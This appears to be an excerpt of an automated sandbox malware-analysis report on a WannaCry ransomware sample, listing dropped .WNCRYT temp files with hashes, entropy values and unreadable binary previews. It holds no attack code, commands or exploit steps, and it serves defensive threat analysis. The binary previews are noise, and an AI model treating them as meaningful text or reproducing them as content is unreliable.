                                                  Preview:G.4.....'.k....j'Q.....h..x.~b4..(.K=.0.[.o.@:Lx..8(...3.LiI...;..1(....zIWm.....9.g........4.H...yE.6l.Z...:.u.RGl....W.J...<....n.{...t+j...g..H2.r.t..D=fMM7.O.Ee ..,..9...-..e....vT..>`..P.Bf..$qQ...z..7G.......6..q...zu....T]..Om$...c...X...~.#..J.*.4...Z.....l2..vYF..a..Q.....x...D.l.....<.9.....:...B(.$k..J...D....;....pu1z..G3..<....R-9.]nu....1.C..!..o..M..B.....?_..|.J......i(0.N.._....U...cI........$h...c.HB.c.....x..m.....L..kk.;../e.;.....W.....I{.T*D(..o.......L....Ie..Bt.h..c....2.r.U:.0n.@v.Y.~.B-.cX'.....w....u...X........xs..V.J+K7..Z...y>.%..Vg.H....!]....J/.&....=..h.L...5.....cf'.\........T.1.U(....T~.&....,.<.$...`...(.4..+.}.)...u.g.u.|....W.n..3...b...hk.f..~...,{.u..MJ....Yb*.D.t...,.&#.x..#.g/p....s............0...f.......d.5,...'.<.@.uA_..8..}.'...n...:...d#.i.....]y.Ol..?..`].....c...iCG...z..W...<....g..@%..'v.... .}...:}..@...J.U1jQf..Qy..v..>.5|)...$.....h....Pn.u`...Fk...t.7..Kn-........p.W.........7$H.Y=..

                                                  C:\Users\user\AppData\Local\Temp\5.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.774742916772408
                                                  Encrypted:false
                                                  SSDEEP:24:+V6at8Qu1/llHc3EXXMk7m9fo5Mvs/VNA4Yukqv:U6OHS/lO+XZ7m9fo5MU/v
                                                  MD5:97F5921D5A7DC61DAB021FF6BB6A0214
                                                  SHA1:59ECF2D69C98EB3D44492E621994A7E89AF57878
                                                  SHA-256:1BBEA9E06F9167E05BB9FF219909BEC059738EEA3BBF2AD5E8BF54A08066B157
                                                  SHA-512:15E230A62F8491A937865E0657287768F98A6F473F12BF1D8342E91A36CA173695C31F3EC2D4F65653B0B0E728DF53EA9C4CD6F91F33702C2C5ADE11D1DE644A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:>..i/..D.dUT.'.m.....k.....Qb..Y.0n..P.....).f...u.d.p:.<.S...1h1..T..m.!K1....B.k..#.un)..x.......n=...../....h...b.w...gE..bI..{~.^.A.E.oT......5.m../}...L.J....{D..9....0.W.......uu...C......vNp.L$~4.I......I.X../{o.0.~.GO..TA.v....(....qd3q...t........o ..D13h$a.Q~.~@.Y..._......$@U..KSS..7)Ko....#]&..+(3..p`..e.....M.8.'..../....Ax....<..P.*..Y.....$x.....p....7........p...C..q.9......&.w.i..g#!.<....s...x4.*Aa.Sk.T..QN......r..]{.......3.J....!..M....r...A...w..e..[>.|..l.k...l1j.bQ?<..G3..e/g.....*..$....j.'.Sb.L'Q.).?:...=#..:PF.Rj=.w....KX..o~..)*.*..5](...]'.bv?.6...EC...i....."..V%.t...}..?(..&......u..tdu...."4{..(../E..-..k....;. ..p.c..3...${.?.....$....v.G..g.(.I+ ..5&+.. .........Lo....+J....H...WW.s`5......I... ...q.OM.~k"....1..~..N.2...+e.5G.E....N..n..S..).c.3.....2~..~...v|.,v>.....v..w......%6..F#<Gq. 5u.p..3..Z.D.cV.x[&.]b.G/.@..C....HY...o...uQ...6.K...G.1|....O..5.>..<.BSt....>.E...l.1Gd...8E...|ZJ........O..i".<a..?h5.].

                                                  C:\Users\user\AppData\Local\Temp\50.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80302777717371
                                                  Encrypted:false
                                                  SSDEEP:24:QSdrH5mbDGPBdXyJ62A3jwntZp/9X42CM1M9/e:9Z5mbDwXuA3MnnH4TM1M9/e
                                                  MD5:964053BCC473411E2E9D9F88820AF2AD
                                                  SHA1:340E5D70FDCE293A8021C9566ED23F70378B29A7
                                                  SHA-256:C292D177C2685E91B460FD0701BC26CBC53D579C2D6E7002F05116963E545EF4
                                                  SHA-512:0716967AD15CB2A4B30BB7D52F2396D4E159913D60E637ED87F05F1214AE8793C80939AB983E301BA2CDBB2EF6DD4178DBEDCC777F4AC4D8F2CE44176E686796
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...}.O-.[........`...-$....#.w..'\o..............L.-.8R}w.0@_.X..k.9.].xb.|.5.L.......D5K..C......a.t.....w....r..).?....s...f.u..6s.}J..*....#.x.0...YvK.;f\B.$...!..$...q..5.q.'..{...?xw.{...4.N...t...M...../c..8..:..`.2+.T._-...|l...t......6O.9._...=..<.%....&F]..IP...j.Ds!}.AP$8Qn....A..J..b.YLF..g..$.....[.#.?!m.....q i..p.m...............3..3..vO..|p............$.]..'.+.OQ....T.G..J.W....E..$... e_g;... He..X.2.........T.v..+.w...).hyd.}L...n..Xt...y.'My-.ps.9...y`}..Q...y....q.2.TFd..R....?<.UO..nL.`J......L......T`;k....[Y..J.;.2.(pA=.'.?....U.......{<Q.H....t\.(...B...Cm..{=....EO..'u..>.B..."...G6g....-..7....:..$...Mz:...5..r8FZm.{.r.c.....$..$.P..Y,`PQ.b..|.m.{..N`y...H.h.l."....^...g.n.4.:M...:f#[@.,.;Rl...h.....e..E,...[0y...b[.p..8.6..O....^.^....B-.C....<..Le9....)..y.......3O..,.@=^.ugb.+...-.ny........Ax..p...)...y..O..0\s.*p.._.!.91..@..7<N.vD.ff....M...w...5n..eV...m.:H.......... ....H..S..D.z.n..l.D..,.o/.B......T...".v

                                                  C:\Users\user\AppData\Local\Temp\51.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813001683623214
                                                  Encrypted:false
                                                  SSDEEP:12:8DnXLlPqJ+yeYbc5rH1Rbxqfx3slCVYGGcy6LDlqp4IK7GetDRg2RzrjEsX/NYwA:8D7QJbLKb9qTGclRqsGqrYCAMBTOo2
                                                  MD5:80CF306836A6F1C049996E8B35B2CEB9
                                                  SHA1:A6956BEC1B2EAC605BE8C97C9E0ABE6162AC0494
                                                  SHA-256:A783CBD3F5D1E92A9B6B7CD0ED548169082AD43B2344C86BC7C34ABC0C5DEC94
                                                  SHA-512:631FBEBA01097D533053C089B36F20A4DC43B3676FA594DD53560C32E34FEE1A6D6D021F8867EB9F76E7BC863654BABA7210C4C3F38952337615C874A380A8D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:5..../.V.....S.:.nQ....8.<[j..d...$uc.,.\.....8`.7..NAn..d......>........u...;4."....~.#.....)\^...HqN<.Z..Hui........e..........$..xQ"Na..B.:"lM:xj...b.*..q.d.m.#..qM..%d/......!l....=.U.+...U.@J@S@.>........+&...wI..-!M....V..P.....~_..<.7jvP.P*..9q.....#.H.d..3.....r.............S....@..$b._..b...Z8@.k..0...>.5....k...uZ....././B.C.6x.....H.P4...mK....3.3..0gcH+.SoW....,!(.(.. ...1Cn.p."C.f........k....\.;f;w..4d.>v..J...AF.....0...3..Z.av]F_(9.n.cm.pT:.0....22...q......./....?N>U......J...=...pJ....?=......]'?....K..S.9\...J<I}..........:...M##.G.Qa.M'..8.k.7*#.{....p\....Y.{....:kw..|.S.K./;pn.].V.|..../..?Ev..ux...R>..!.......3..:.q.*..._.P..SM.{...K..Sj.S...d..e.?..6.|.@./h`.2...\a.0-...uL197..%.R...a.+...q.}j.C%.s...^nbI[..dr......o..$......_....W.....v..Y.6....,.YtR.T..v..........v_N.N?+.-.z....C..r.z..\..g.,.dyc...NT...OG[.Ij..b..i.3UxP../..;b.<)......./Z.D....dS..sW>......_......K.w..(.3#...~"..#...x.-...Z...dR<....u....&.

                                                  C:\Users\user\AppData\Local\Temp\52.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.793923022248367
                                                  Encrypted:false
                                                  SSDEEP:24:3BJpoI5t3M0Aw0nRn2v5dVhmx/+dXdVp6JdG+14X2P0XJU:Jpb3M0AhnxS5dV2/+dh62+ymsZU
                                                  MD5:772B750197A3F37CA8168029FCCD81C9
                                                  SHA1:FA47ABC9C69F2A4F3561912504ECDE85D9764593
                                                  SHA-256:82765F72AF9CD140FFE169E53A2E05234BBF6FCE9BBC77D98BD9D4BA5415C24E
                                                  SHA-512:D9D168E76C90778D4BA847E95D9AEF28539776F712178158B68357236A34E8598E0CDFA5BD2D3BE3F97B856726D58BB721A85E389ECAE6B58863AD5E1177E520
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:wi..5M..&..u.5.6....... .3B..gJ8...m.(.|.i..+=.....2......6r..Yi.;.* .A.....*Djh...).q..........KV..2T.7o.J..X..;yM.%L.W/Lex"gz=...F...u.mf....Fv.@.. ......r...k'.+hF^e9.-..<..o%..p...WZ.gv....hi..... .py...)h........ !.~......d......T...P.....c......?....=m.f.......h..*x.k......U,.0G..K.9.S.X?-.....b..G3..^..`..~.[j..c.9'r\L%...&.<Z..S.."..=.~....".....W.+.h......d9..a.......m. <.V..W....V....^ju....;....B....:v.0..._....1..I.&1)%.X.d.t..`s.....0L..H.........h..,..._.n.U.Gb6..dSh..`...<..D-..\......N}.l.,.Xj.%..E....m._..S*n.}du.;q.........Ed.........%6<..GT#.....5.....L=+.R...'....).P........d...\............k=*B.."..x...@.X_.1q<....`.]"..B.B..}.>...^O!M. I+.m.....7....?......!3.....R...<....*vq.?M.....^..w...4..mu..r.;......3.5....x.V'%7.y-!...v.....FnC..Y.....#..b......S9.v..F.....[..{e......W.B^.........vn)..`a.GjV.GC...l...U#..VA._.%.Fd.....,...u.....$.K...a.T.9p!..9..|..4.2..^.....8..k..$...DK.?K....q,....9.m..@d.Y........D..M.c8

                                                  C:\Users\user\AppData\Local\Temp\53.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.847470339597998
                                                  Encrypted:false
                                                  SSDEEP:24:IHbWiRAMeypooJ99aSAC5CCuTSYLd+Xhg3312vNhTSxqi:IHbWiR7Dpo69+C5CCGSLhg3AGxqi
                                                  MD5:38BB5FD980EF362A67D9A563E5A71B7A
                                                  SHA1:F41BF4E84333E8EE48F5913463F4213C95218B54
                                                  SHA-256:E98EA4E4E143432D3A1B186B024C5A3DB37F982975E2081507A9D38447262EA8
                                                  SHA-512:3AFA61CA1857903FA4B86106FFBEFFE93633121507F994C4022703D540C45403BE9E2D4168ADF421561DD4B75196F06CC39E035D53B6DD17395588EDB1606B05
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..}....i:..s..N%.@.I:.E.1...o..r^.C..lcX..pA...8..3.GI;Ka.H..D.k...D.n......f.yx.;.=....4..&....-8o.R..T..O..#.D..J. .l!..#...E.(Y.D...s.:.Wd...V......|...,".j..o......0..J[..]'t....a.y..Y...zs.`\P*,H. $/w^..V.a..f.H)kv...8cbs.9@..".b{pNR......%....|..}.T.ir..*[.I.rz.P..$D.rm.....s..8.G..t...m..y........x.vj..CN.1..7.r.+....2..rkAt".Aa.f......G.j7%..~{....U..^.A...>.....G...^........?.Y).k<.......x#.s.e.Gu.ib.'.;.5.aN...?.=.."h...2.PgI..`..z..^.K.v.@...}Ij:$=..R5.<..W:0..LW.z...$a.\PS......b..n..c.CF.:.F.$.....g.oE..^5.../....81.....*.N.!.Y..H.c(..K.....nF.g;.....TC...??..4.....r.<..+]..V....*...C..2-......S.>..x.5...l./.).m.tm...(.M..Y.o..w...%.7.C...V....s..nu..B.k.....=0...tA.*...9.u...0"..l`$`!..o..z........v..&u.\._m..%..>%.[.c..s?`3.....T.K.e........`D#>..R.2.....z....~...ZG.M.b.lk\.`dI...)..g......F."...2...U.2..6.L...^7.9..~...tJ.P.D..}.s..q8..Qp..&....G0.Mf.d@./8...6....-q.qF.FU.p...v%..~GQ.}..P.:.......M..p.=nt..irrB.)`.......)....n..jq...

                                                  C:\Users\user\AppData\Local\Temp\54.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.824497585972653
                                                  Encrypted:false
                                                  SSDEEP:24:wNW6UhztvV18Z7r20GM2zDStrz3+X95gX2oAhYDv97iTH:SW6UhhE7rhD2keXbgtA+Dv9ej
                                                  MD5:B0507E493A900C25C0C1F53008553840
                                                  SHA1:66BB53B0D1B4CAE13B4358BDD627193EDECA9858
                                                  SHA-256:79A47E41890CCF62983FB1E84DE25C6B5AD42A8942082FD6418B988F42680F3E
                                                  SHA-512:E607B204545D55C8395FE950F452A3538C88FD1E412362FCB5B3BB041CFB953FA30967007D12240159146D694E100158605FA47B0E3E45E52676E0FB2C33F58A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:G...{_..)...-./'.w.n.=..&.&\..ii.G,M.x....M....d.-..S.V..I.sa.[.......y....o...X.V".2.NP...R...OO..i..z.".k./..H..........Q0./T.gbq.u#..y.c......N..a..5QZ'...q....wN.z.aY....]$JH.\FY.]....]..vX.#...__....Ze$..@.&..-\.)..........~eC+..v.K.@.b*...N.$.........;....s..^..._...u...+S..6.=...'.........9..<@..J\_.4.y..j4r's....N.6fbE.x...X..x.\....Q.......V.c#Y.W..P.G..+;^d%.4..F...s...3...T..g..5..u_.-.}f6...P..>%..vS2.^..[..'.5uV.E..[.....RGy.0.r...I..J..S}.lS:...f7.6..{..(.N..=.+vi.Rz!...L..QC.=A..4..W.b.C..v^.%:...w...F.b<.'7.....C....5m`X2.........}{?..`$...C.b./.O.C..s.g..=..m...2."]BN......O.q..y.7.\..........d.X...Y...C.. ...<l..y..H{Q..3... .c.gg.......JH...>...?........6.z.,.........0ljo....e.Mh.1..........IM.?mZD...._.Ac.pJ<.".Gy.M.K....`.......?.l..O#...g...4r.D.......s$2!Y.C..... H.#R+.+.....5....X,bq.t..T,J....6.5;z|..8..kO.....nZ...p...p*C...wclW....:..;.....w....gV.Ix2..'<X...RO.,....8........>...2.'.K_.z<.0.U....LHI["..(..:.

                                                  C:\Users\user\AppData\Local\Temp\55.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.790706969654274
                                                  Encrypted:false
                                                  SSDEEP:24:8IQ+g3MVvnyYSJ4ue6hWal/qvjCiXUaWtm6M:8IhgU9q4shWal/qOiXDWe
                                                  MD5:05D85E25B74BCBB3748225A443C3D55E
                                                  SHA1:D886332244B5648091FB4794B6A64B4369AD0233
                                                  SHA-256:32E776C4FFBF771AE43341EEB33F6B05FFCD4DB6CD020391BDE8FD3CE02C22CB
                                                  SHA-512:59E5D35BB13473D64EB3201FD1A5AEE68CA4D77A2D0DB61B3AFB4A8B053B0109FC81293EFC310021F87B8DC0EAACDA3665900B9635353051D82B07324B7B2100
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:E..."^K+.........1~.b....h.m.%.5.8..M.9...h..l..6.p...-e....0*:..u.P.O.........~W...*...a...q.....O5......!I.w.._7..8~..{k.......d.......&.WRBh.-_...A.\a.p._4. ..n...1..._.Be.!..0h..$..8...*..T.....C!dW.E.......H.. .7.U...p.!.W.........-.+.....hWz\...E.u..^.h....%..;?..._.I.'O.!C.t5..Gy.\..)..{:..w.....g.:b.....=..}..%bAH...........2...(...}=1..-.....v@.5.I...&L..]TcD.0.N.R..U2c.~g1..........T.:..nWya..R...4...b..M.'.h...US.z..%..W..d|....~.......>,.<..M...3.?.Z.....LD...d.Qt.c......Gh+..}..MX..7..f.@t...}.3.].).M(....o.%...O....tKB.W.Q..~..1..]\S.Cn........... .S. .l...G..Q{..:.t.F....c[~.J....B..\......Gl...T.j;4.G...^...D.@L.0m..M..bQ..F..{r...t.oK. ..........Q....d......3-9......-....v.v..{.Ar..u;....H.-....^.+.PaU/....d.j./.g......R+..\.u((...m.g*9D..F4,.j.u2..J.........."..m.P.03...F.l2.....[.+Z.S........MS..S.I.>...EV.T....P.lB.c...1."..<r.....BUS....>.AJ{...sv..GH.0-..?..Q.3..7.....X_i.W.............}3...f..W .zb.GBjR..|..,W..../Wj

                                                  C:\Users\user\AppData\Local\Temp\56.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.791617140072544
                                                  Encrypted:false
                                                  SSDEEP:24:vxJB1vIbc/R325nwrqo/IDVmrgA9CIJbNMAiqvV:Z1vIoZwnwu1V4xEA39
                                                  MD5:25FCAB95331909AAC0507AD8B7EF4A23
                                                  SHA1:CA8FB9291B38254F5F0AA3D601717A90C592C728
                                                  SHA-256:33F1E8CD27F852D452D7A19CECCC670FB91947044C0DFBA85821B892F96BC0E0
                                                  SHA-512:B995E3A26B5D3FE762C7ABA12205406B884A33D1965C1F79E18CD8FDD3C53BE46C30E1A385C40F60C231A2585D1AEAADEE32E3CF56EDCFB03D47B612DE8363C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.a..eu.].,...<N^\SR.../.|..<h..f..........T.....MB..Q#."......G*....._y2..A...O.dfQ9`v.E].....\A...'.....u. ...(d...F....A'..e.o...g1..P.4...[L.....=$.0..9...0..y...x.|.{..q,....J.2...9..f..6Y....b.`.$.....7.n.".TX't@%(......vc...iy?...m7]q..?.t9.....y(C.0)...#.a4.i...^......bC..i;u...lV...EcB;..O.<.#.....r\.4?\A*8..Ft.~.P.r..*B..#4.z...}..3.0n=....c.z. .;\..qw..7.%j.hd..a}..m....}....{.h.k...<..fa.vq\u.G...=....F..0..m..Jx.6v..e.N..Hz...Vm,.;...5.,.........j.xlu0......;..A}.Q<...r...+.5....|.,..PI>..].^]e........B2..!+U..q.[.".g3fN.62u..Zia...I....m.Q..2b+B.n..G..7.,..........V&.P...E.@tXUN..].......y..!z....Z6.........^,5J.....B.....G.1.Qe..|n1.bu..>.Mi.`..%"B5Av.c.!....w../H.0.1>+....[...Z.\-Q........=...=.GK.3..y..Y...b....h9.%.u...5.n.7t....u.|.y#(..R:E[Q.q..u..)v...Q;....D..R.G.sfw.@y.......U.....b....k..h..C.8...(.w.h[:}....{i@M.3..............0.w.PS....[oiq..ni.?._"?DYl.){...&(...B....jme;..z2..-.~...c.lg.b"..(B....T....@v(

                                                  C:\Users\user\AppData\Local\Temp\57.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.826449049195866
                                                  Encrypted:false
                                                  SSDEEP:24:gVU1czT74CGq1AsY9soc6VhdN+9v/Ob5osBFhgSsCtY0+rrHLN:wUi+J3sP6VRCv/ONPRY0+rHN
                                                  MD5:5EAE5DD5F9B748505540325FDDEB0E9A
                                                  SHA1:A23C2D51C11705DA4964A8F0EDCD4A1E3A9216BD
                                                  SHA-256:034F87826F2B31CAAFF147717562C70AE2864A5743BBA209B4C77A06F8CDCA74
                                                  SHA-512:80BB34F1D5DA45ED32869FA03C385AFBEADB70D43C89E97684B3F22E9BEEFCDD8257056A1A00C6D03F73DB97D85B5399A6D940D125523F36B17D5A86F9874439
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..e...}.<kW....:4`..1c..+l.......r_.{,2y..2..(....>.......QdH..$M..{.1Z...5h.....J.j`..{b...s5r.U..Eh......N..(n&.v..... .......>...th....b.}I...qF..T.:=....c.=..I.~........v.G.gF..T..t..X.....S.~..)/..W....j...>+.(...F8.'...../.....n..G.:Q).....{Q.q.c.. r....o..?...so...U....>_&..!yu./.....=.....H...JcPE]...wE#...Q9.....4..`p..x.Z.*S.g^E6-.}^..w.D.zM.KR......L-.1*.WX:a...T.?o.j..i...c.....CR.^r.v.0^X.!..E.+B........(O..q.D.oO3v...T.......S-..5...%........]^.;Dzb60'.u.9@EcCjE.....9...}..#M...b@..Q....r.p....k.@....S'..,!N....!V..6...Y9z.{...w..)..5....V>..g.V.....1........HY$..Fz.K)....&.p.I...V...g.............>j.+-..pqk.|...a.4..5.......7=.k.S..55B..........= ..A..x....E>.&...xE..d..*.R.l`f\.<.&.M{...U........n..4gw..N...\.&F.4.....D.S._.C.K...z.rj...*NoZ..Z.%X.....hj)~0......&..?...H.....Q.d...!k.B.E. .%v.O..8..K)}..4...`.P]D..w...m.....Ez.....R..$...:....h.[..2j......'..za...[.^..o.<..J.N.:L.....x.....i..hfB..(....a?D%Lk.C...:m.`..

                                                  C:\Users\user\AppData\Local\Temp\58.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.79232013754835
                                                  Encrypted:false
                                                  SSDEEP:24:oZxl81JpnmwfXXJMj7LhP84SSdtI94Drob3wMV94wvowVOdg9VJ5Q:+xomwRMTpnVqwRMVxpJi
                                                  MD5:8E835949F0D8BE5FE6AC747F00599727
                                                  SHA1:0A011CF3D8E0ECBEA4AEED70E1D7BA3A1A5E9929
                                                  SHA-256:57E6E4D594C412378F534977FFF1DCC758A90A97A8F7D7CBED5A44F7615092B8
                                                  SHA-512:27E2DCB2F5A37190364239CB176F5A6B3A8A29949C5E93629E5DADE513A1836070B26434231B5BCEF67D3602C2E4BCEB0D76DECDB0357C8BF0E7113450D3FBA7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:5s9...A].c....o j.s.....1M$....69}.}n>...7.1..@..w4.8....O9....i.f..[%..<.c+j....L...#.?.....:U..`a.....B.\K....vY_./...-.`'4Y...2TE.~.l..D..e.uz.=M......&...$(c...K...s1..~Z.H...k.<....U..N5..f*..m..[..%..Z_Rd.....wCs.J...5.r...~T.E..n..m.....[f.j.Ku:...4)g..#...w.&'....O.0..].....r..mx6.V9.7..^k..!....(0\..>.+..aXH.......V.lQ.....@.t\..-.s1.nR"...Y.b|g...b[B..f..V..>j....!....b.|..`.......t..-D.b.DCT@...6.1s.Ms..a...-...9Q......q".........!q{q.%.......o.0.X|.'.........c...|..+.... ...<`.....yC.=...5..V.m>g.PdY..\.........[.4...G...q.0e.N]z...~.:....t.U.I.u.....Z`..y.?.XE(J.<.Z.....a..u}.....NN.F.U2........[.!e....'..T.?*....Uz.E.....T.%........_...i(..z_...Z..S..K.(...<L.....wBMt0..i{..b.7.}..muo.;..O.NG.&..3..]r......!3N./..Y..K&=.:(,.@.{Dk...I.Zu'.....f...Qy.NZoh{"...u...\(.%..1...j:...a.e..}.R..w.y..\.......1. ..}.X(.. .>...A..0.oVu.......0$vj.Aw.i;..x...m8...D.a....C-1&......L..P..%2....h.3&%.f......@.]...Z.S....E....xr......=~...Z.*....

                                                  C:\Users\user\AppData\Local\Temp\59.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805824408024066
                                                  Encrypted:false
                                                  SSDEEP:24:PNr9HCIwSSHZt7/hNuvjSw+lqhFkKEclLCZi5+czLoE/8pXH6:fHC3SaZt7/hNuOLlaFkKEclaEvME/R
                                                  MD5:FEF28180F5DEFA1FE68487728B4949BE
                                                  SHA1:9B3F86BB55B017EEA1F784E10CD283D26CBBD7D9
                                                  SHA-256:6FEA34C9131DA3FF13A8ED6B813826AC8D89A5EFE391410FCD52A92A9654F466
                                                  SHA-512:45E2DBB228A894BBF4BBD31B6306DF91B7EA94F4002EFBD00580F323EB8A30FB5CE1C36B95C888D5788765C36AC096A4E4EDB0FAA782BE1A9778FF467E0E0F7D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....;....=.o.._/|..$.:. ....*.~u.H.TA0..*<.t....6M.....J.w...a....r.p...%~.....d.~(F.B7......a....._.. .6~.Nqc........'.q.>&...QbM}.M....f....H....XBI.!\.6../s[.$W.;.q..-O..7.g.<.......O...-.,.`.~j.8....I.9n.f{ZH..sV.*2S`..4nQ.._..-..~..../....dl.-_..j.0..i=..'F....GB5..!Y.[...n.[.....a..!..Z.Z.t^SX...O$....!..}.yC.x.K..n...o..^CVw'........[.6p....zd..\..Rb.Z......r-...,1..."".*.R{e3{ S.....eg....J.....Q]..1.....N.v..d".b.....}..."L0..jy~....U'..>1u..A:......j......w.:g.....aU.ar..2.f}...S5.Y....X.1[dO..-.b.._...&.!Pk....Y.V...-}.8Z...j......I.yo..a...#^.y..a.>..%.eXJ...*..1/.#b~..w.>'.2........l....1..c#.....j....J{......:sn....>_a.q.\.._...t.{..`N..u*7...S.:............KL..\.Q.......|...tu...I......@.G..ZBT.|...[..*.#..F9..W..w.Hw.....0q...p.O,..(v..S#}.X7.uf...ak..;!.R.Y...KH......`...[.@.J.*+.?!..S...6...@\.D..s!.Ax...[.x-v...q.......%UAA..3,z,`...L..".c}.X.x7.>h..!.si.q5..=.v.....2..Q..(Y.j.M...)...'.....5F6..w[b&.6\.\..|.....XK..yV36.(|.....

                                                  C:\Users\user\AppData\Local\Temp\6.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.794064516864858
                                                  Encrypted:false
                                                  SSDEEP:24:UyuQ6tLe5xlPsBZesAIzom+xGh1m1F20T/PtjW6jERNwUVg:nuQ65Yar+Gh1uFL9jLjX/
                                                  MD5:A7FE7DA33DD6D27FE23582BE8787B170
                                                  SHA1:3D28688AF0F11667CFC93BE036D0530A79C53AEE
                                                  SHA-256:19FCA46084D702B3BD891D2E807BE4CF84EDC03FFD465A7DED7D5C5F65CE4FE4
                                                  SHA-512:B2122BD46EEC9B77665FA58D8FFD7736213E5224D0688D7FF31FBB4C8D61FC60BBFBDEF444086FC04C23C9AC4FAB578A58903599D90A4A855C3DA19F33FE4560
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..A\....F......`..V..v]..k.....h5.._...K.p......IB~..:.d}.p/.....5+.....,.M.R(.6...5....."r.ckm........?....T'.ct....@.......s.....Lb........]i..J.....hPY.?*.E.R.O.....S..c.#.._...3.4.3<.y....>F.....A...4.8Qd.*R..>Tl.c.....g.A.%<.R..L7h.r..IPy.%..1z...<...b}*.m.....?+..Bf)O...S..m.wq...`e.i/tE..#u..W.$L.....).fx.p..d..A.._.`...:...y..!.k...s...!_.;....pG4c..A...V.6..6......Zi......=.....1...O..........uT.......L..K'.8sU..}.D....@K.tt.{..B....[..'.......3.^. }...6.A.r/,sc."m..hd.&.M>......*w...!.i.....]...[....sy....NXT6gX.z.4.........r...!...}.{.r..W.."..w.(.....3.4.B...O.$h.Z_.'.&L,......-m$@t!7l...3.[...r).i......O...W.6&2.........M-?.x...F.k...s.......x.h.H..=.Z.s.]..,t[..).6gk<....G...x>Fk.}..........,V$^d...&......i...?x..V.R.*{ :b...y37.cz.n....b.......yh.5..q..N..%..0)............J:%r.~.... .\RM5.D....J.u.....j.(&.V.;...M...q....d.l..C.m.h..!S...^..h....T&...T..%...[.qg.G.O..L..8...t........jU..n(g.U....X..<'..-S.2..#.q....t..}...

                                                  C:\Users\user\AppData\Local\Temp\60.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803341746289428
                                                  Encrypted:false
                                                  SSDEEP:24:yHkLJymbRt/LbFeuaUe5iGaeOT0VdkKVH1Z6:vLlhpeJLZ6
                                                  MD5:808744CED06394BCD0591F65D1DB7F80
                                                  SHA1:C60BD50AD196517BBA21745F1C829AFC201CE1DF
                                                  SHA-256:11B425FA61C9E77F0AA3F6467BB17C7D9563DE2DE7D2C42123D4983C252EF24C
                                                  SHA-512:AA0BF9A7C75583DF2BCE3C6A59DB0B5EF1ABACD1F4B0ACB4A31712D96C1177BE653E730C480FCBE577D06C3DCF58149A3AEDD950CD7A0253B5CCB7C442F9E29C
                                                  Malicious:false
                                                  Reputation:unknown
